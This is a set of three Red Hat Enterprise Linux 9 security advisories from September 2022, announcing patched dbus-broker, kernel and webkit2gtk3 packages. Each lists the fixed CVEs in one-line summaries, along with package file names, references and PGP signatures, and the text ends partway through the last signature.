Red Hat Security Advisory 2022-6608-01 - dbus-broker is an implementation of a message bus as defined by the D-Bus specification. Its aim is to provide high performance and reliability, while keeping compatibility to the D-Bus reference implementation. It is exclusively written for Linux systems, and makes use of many modern features provided by recent Linux kernel releases. Issues addressed include buffer over-read and null pointer vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: dbus-broker security update  
Advisory ID:       RHSA-2022:6608-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6608  
Issue date:        2022-09-20  
CVE Names:         CVE-2022-31212 CVE-2022-31213   
=====================================================================

1. Summary:

An update for dbus-broker is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

dbus-broker is an implementation of a message bus as defined by the D-Bus  
specification. Its aim is to provide high performance and reliability,  
while keeping compatibility to the D-Bus reference implementation. It is  
exclusively written for Linux systems, and makes use of many modern  
features provided by recent Linux kernel releases.

Security Fix(es):

* dbus-broker: a stack buffer over-read if a malicious Exec line is  
supplied (CVE-2022-31212)

* dbus-broker: null pointer reference when supplying a malformed XML config  
file (CVE-2022-31213)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2094718 - CVE-2022-31212 dbus-broker: a stack buffer over-read if a malicious Exec line is supplied  
2094722 - CVE-2022-31213 dbus-broker: null pointer reference when supplying a malformed XML config file

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
dbus-broker-28-5.1.el9_0.src.rpm

aarch64:  
dbus-broker-28-5.1.el9_0.aarch64.rpm  
dbus-broker-debuginfo-28-5.1.el9_0.aarch64.rpm  
dbus-broker-debugsource-28-5.1.el9_0.aarch64.rpm

ppc64le:  
dbus-broker-28-5.1.el9_0.ppc64le.rpm  
dbus-broker-debuginfo-28-5.1.el9_0.ppc64le.rpm  
dbus-broker-debugsource-28-5.1.el9_0.ppc64le.rpm

s390x:  
dbus-broker-28-5.1.el9_0.s390x.rpm  
dbus-broker-debuginfo-28-5.1.el9_0.s390x.rpm  
dbus-broker-debugsource-28-5.1.el9_0.s390x.rpm

x86_64:  
dbus-broker-28-5.1.el9_0.x86_64.rpm  
dbus-broker-debuginfo-28-5.1.el9_0.x86_64.rpm  
dbus-broker-debugsource-28-5.1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-31212  
https://access.redhat.com/security/cve/CVE-2022-31213  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYypfkdzjgjWX9erEAQiYfQ//fRtjolqDZyqH7L9xztUuHaw3lSHLNA8h  
l6S0hdRm00n3LXLV4b5nUP4w658nabDNZnpHpbEPhJ+zmIpYsuxgU31ZdqaxDt0N  
VxKwJVZhr9Cl/Rwq0kTsfTNxa0eh1xM4UMpGp5VRG1Heybh+/OoIy2b8U92zKXy7  
tkiiMFe+XHc6GvWYLcV5ZssTkWRPqq9BIFkbC/pv4H0ZfEZLEPtBROTiDdXYeWv0  
232PgOdXhxC/chXMLKZ1hrxerF317fTv6F+oVDXCrCHoTi+1KcIxAejieffnlQHE  
IdmjRWKPs51JpA7byflFsn6vZH623vqm15/cRz3jJs3EWZVoaPJL/s84siiNt+Pu  
Oy7FiyUN00NUDRzrNmo/JBGrqvjDjZAU/KyxaKBCPzttSpDVD5QK57khge6giCjM  
+5cXKXSuuMah7fuIcx08vdr4BGlXmO3J7r2q72LeiU7JFws3KSawj8c1G/YgxxU/  
J4NXuKStijmLrkyuP7XwPe3okV6LFJhArAUY8yVGZfcuD8gwWvl/15hpYmB5R1VW  
WG9S9JRPK3hDCIOw3w3i3wbLh5yBSoQJTXl57QO4+5CVhBHxKnPzjWDY8Xg9MdDr  
2a/s907lzbO1WQLl00mxBkngHcT7vRGPammpSyfY68Sg1vkJzLM3DceHZoTF1JP7  
7NxUgIwhSCk=  
=clNW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6608-01

Red Hat Security Advisory 2022-6610-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include buffer overflow and heap overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6610-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6610  
Issue date:        2022-09-20  
CVE Names:         CVE-2022-2078 CVE-2022-34918   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: heap overflow in nft_set_elem_init() (CVE-2022-34918)

* kernel: vulnerability of buffer overflow in nft_set_desc_concat_parse()  
(CVE-2022-2078)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* RDMA/mlx5: Fix number of allocated XLT entries (BZ#2092270)

* mlx5, Setup hanged when run test-route-nexthop-object.sh (BZ#2092535)

* many call traces from unchecked MSR access error: WRMSR to 0x199 in  
amazon i4.32xlarge instance (BZ#2099417)

* X86/platform/UV: Kernel Support Fixes for UV5 platform (BZ#2107732)

* block layer: fixes for md sync slow and softlockup at  
blk_mq_sched_dispatch_requests [9.0.0.z] (BZ#2111395)

* Fixes for NVMe/TCP dereferences an invalid, non-canonical pointer, kernel  
panic (BZ#2117755)

* Adding missing nvme fix to RHEL-9.1 (BZ#2117756)

* nvme/tcp mistakenly uses blk_mq_tag_to_rq(nvme_tcp_tagset(queue)  
(BZ#2118698)

* Important ice bug fixes (BZ#2119290)

* Power 9/ppc64le Incorrect Socket(s) & "Core(s) per socket" reported by  
lscpu command. (BZ#2121719)

Enhancement(s):

* lscpu does not show all of the support AMX flags (amx_int8, amx_bf16)   
(BZ#2108203)

* ice: Driver Update (BZ#2108204)

* iavf: Driver Update (BZ#2119477)

* i40e: Driver Update (BZ#2119479)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2096178 - CVE-2022-2078 kernel: Vulnerability of buffer overflow in nft_set_desc_concat_parse()  
2104423 - CVE-2022-34918 kernel: heap overflow in nft_set_elem_init()

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debug-devel-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debug-devel-matched-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-devel-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-devel-matched-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-headers-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
perf-5.14.0-70.26.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm

noarch:  
kernel-doc-5.14.0-70.26.1.el9_0.noarch.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debug-devel-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debug-devel-matched-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-devel-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-devel-matched-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-headers-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
perf-5.14.0-70.26.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debug-devel-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debug-devel-matched-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-devel-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-devel-matched-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-headers-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-matched-5.14.0-70.26.1.el9_0.s390x.rpm  
perf-5.14.0-70.26.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debug-devel-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debug-devel-matched-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-devel-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-devel-matched-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-headers-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
perf-5.14.0-70.26.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
kernel-5.14.0-70.26.1.el9_0.src.rpm

aarch64:  
bpftool-5.14.0-70.26.1.el9_0.aarch64.rpm  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-core-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debug-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debug-core-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debug-modules-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debug-modules-extra-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-modules-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-modules-extra-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-tools-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-tools-libs-5.14.0-70.26.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
python3-perf-5.14.0-70.26.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm

noarch:  
kernel-abi-stablelists-5.14.0-70.26.1.el9_0.noarch.rpm

ppc64le:  
bpftool-5.14.0-70.26.1.el9_0.ppc64le.rpm  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-core-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debug-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debug-core-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debug-modules-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debug-modules-extra-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-modules-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-modules-extra-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-tools-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-tools-libs-5.14.0-70.26.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
python3-perf-5.14.0-70.26.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm

s390x:  
bpftool-5.14.0-70.26.1.el9_0.s390x.rpm  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-core-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debug-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debug-core-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debug-modules-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debug-modules-extra-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-modules-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-modules-extra-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-tools-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-zfcpdump-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-zfcpdump-core-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-extra-5.14.0-70.26.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
python3-perf-5.14.0-70.26.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm

x86_64:  
bpftool-5.14.0-70.26.1.el9_0.x86_64.rpm  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-core-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debug-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debug-core-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debug-modules-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debug-modules-extra-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-modules-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-modules-extra-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-tools-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-tools-libs-5.14.0-70.26.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
python3-perf-5.14.0-70.26.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-cross-headers-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
kernel-tools-libs-devel-5.14.0-70.26.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.aarch64.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-cross-headers-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
kernel-tools-libs-devel-5.14.0-70.26.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-cross-headers-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-cross-headers-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
kernel-tools-libs-devel-5.14.0-70.26.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.26.1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2078  
https://access.redhat.com/security/cve/CVE-2022-34918  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYypfhdzjgjWX9erEAQjSpg//Y3ak+k0a3QlbNSwSEH9F0GLE0KOV9tk+  
xPp+xXuUzNJ7iQ3+UhgksBs1faIBtvNgpURFZ2xsvIY3Z1TtuK0G7bBLffd0yO9J  
6fTDVZmeeCrlmwrWtKCT/2rm10tAk/zQA2BftzG6M/1fcFjfKB1N/k+KXwp9Jt/n  
1WC19sEAZWAUGW2Fxe7500HvN6Q/24EWPn2OcYGdXzS/XNqJwdK148OYg0A6pBtT  
hk7NOXMJr8fTABdg3BPnEXly1udTUgJnF0gvOl0tB6WNLxnHxc/61XnWIAk9/OYp  
DchPL+f7G/lH+5O2EgJG5OaFaUrznkbu8U1zEGOS1rZCdP9kMrX552P60jD4br4/  
K1YASzwh6bp9UqJKtBEW6O2hX+s89o8Hzuyrdnz8Cy2AMD8Q0ceqnu8bTWhKHf/l  
daeLjh2vLXNRMeQZEpaYtiOOQNIGmVA1n/Zd1A+GoNcFmvGbQ4+G8l18GSvXc09V  
A0o5vL6fwssDeLCkuQi+pw5YBgvPC083Q9tQH9TS2Fr13unk5H3bj3duMzI4t0Ao  
g0E+jKR7VaVCA2B0syXr5XyWqKZ4pFIQZKq547LpdjivCLnvuD3WsTNwGxTkSm2u  
Aq0jQvXi2A2bZwd+PrsfWqAqVr9i7G3+vElmsPD9p6tajT4z/1iCbhC0YMqncE7P  
aCsumFjp/qg=  
=bwiS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6610-01

Red Hat Security Advisory 2022-6634-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: webkit2gtk3 security update  
Advisory ID:       RHSA-2022:6634-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6634  
Issue date:        2022-09-20  
CVE Names:         CVE-2022-32893   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

The following packages have been upgraded to a later upstream version:  
webkit2gtk3 (2.36.7).

Security Fix(es):

* webkitgtk: processing maliciously crafted web content may lead to  
arbitrary code execution (CVE-2022-32893)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2121645 - CVE-2022-32893 webkitgtk: processing maliciously crafted web content may lead to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
webkit2gtk3-2.36.7-1.el9_0.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el9_0.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_0.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_0.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_0.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_0.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_0.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_0.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_0.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_0.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el9_0.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_0.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_0.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el9_0.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_0.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_0.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_0.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_0.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_0.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el9_0.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_0.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_0.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el9_0.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_0.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_0.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_0.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_0.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_0.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el9_0.i686.rpm  
webkit2gtk3-2.36.7-1.el9_0.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_0.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el9_0.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_0.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el9_0.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el9_0.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el9_0.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_0.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el9_0.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_0.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el9_0.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_0.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el9_0.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_0.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el9_0.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_0.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32893  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYypfctzjgjWX9erEAQjA2g//RRYnsrJwmLSw/YoPS09EbxgsAaJ1RtRo  
qkrYvpnvgUUcR8R9DBzn7BLmPq2t/2sQBO7xI5i0Kl1c1EszV3+Zy8gLhNWc0A0+  
KPdWKbrE2pEd7SCI171Jmphq62q6leogd53Wj0KHaVIjjxO6pnoQqwlKWAELpk0f  
6jd9TQqvdiynZuHTELTj2AlkqYDP/Lola+hsNAfAm0klKs+QMPujtqP02t8pd4NA  
NL0Jn4EjSXQHKp/2xDIw04SX+ZaBhONmnxe9BP+oD7xrdO1MiENph+SRrIH0kIGV  
kE2aOvOymNe2g1VIW3a3flbt73XP7/wBi6fY61vh8wu3vrIgarUFDsVTuXUbqON6  
REw36NZP67ypl83h7odbLVPa0BQ7LHb1ALlZqQ0q717tbeTu/vzRhpyqzlEdJ3/v  
tpqzLbwYpmWM9l5a7WRAgEGBk/5n/wSP0hSWvM16nT/E+F4gmf6DsaTMVdhlxbRI  
